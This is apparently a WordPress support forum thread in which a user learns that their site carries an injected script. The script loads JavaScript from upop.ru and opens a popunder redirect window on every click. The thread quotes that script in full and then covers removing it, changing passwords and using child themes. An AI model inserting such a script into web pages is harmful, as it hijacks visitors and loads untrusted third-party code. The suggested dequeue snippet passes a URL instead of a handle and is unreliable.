I just check your site’s View source and find this JS:
<!– sidebar script –><script type=”text/javascript” src=”http://upop.ru/promo/topbar.js”></script>
if (typeof _popwnd == ‘undefined’) {
var _popwnd = -1;
function _popwnd_open(){
if (_popwnd!=-1) return;
_popwnd = window.open(‘http://quickdomainfwd.com/?dn=upop.ru&pid=9PO755G95’, ‘_blank’, ”);
_popwnd.blur();
window.focus();
}
};
window.addEventListener(‘click’, _popwnd_open);
This JS added by you ?If not then please remove that
Hello fmueller,
Creating a child theme is probably the best method of customizing the default theme and will allow the greatest flexibility and even allow you to edit template files (besides just style.css) otherwise your changes will be overwritten whenever the theme is updated.
@ Ahir – many thanks, that script looks indeed suspicious, and was certainly not created by me. Could you point me to the file of the web site that I have to edit in order to remove it? It is not in sidebar.php. Where is it???
@ Madhusudan – many thanks to you as well. As it is, I had the site running for easily 5-6 years, and this has never been a problem. However, since it has now become one, your suggestion of creating a child theme instead of just altering the default theme without changing the name might be worth following up. Unfortunately I have no experience with child themes – in fact, I never heard the term before you brought it up. Could you point me towards a good source to read up on this issue?
You can follow later on: https://codex.ww.wp.xz.cn/Child_Themes
You can open your theme’s header.php file and see if yes then remove it otherwise open theme’s function.php file and paste this code in bottom.
function wpdocs_dequeue_script() {
wp_dequeue_script( ‘http://upop.ru/promo/topbar.js’ );
}
add_action( ‘wp_print_scripts’, ‘wpdocs_dequeue_script’, 100 );
Change your admin password and FTP Password
let me know if it’s works
this is one type of malware attacks.
you can follow this link for malware checking by DJDoubleXL189
https://ww.wp.xz.cn/support/topic/latest-malware-attacks-and-solution?replies=7
Yes,here are some guides in case you haven’t made one before:
https://codex.ww.wp.xz.cn/Child_Themes
http://op111.net/53/
Many thanks to both of you! Much appreciated. I found the offending line in header.php and got rid of it. This seems to have solved the problem for now.
I’ll have a look into creating a child theme tomorrow. Thanks for the associated links. It’s getting late here in NZ and I am off to bed for now 😉
glad to help you,here in India we have evening time 🙂
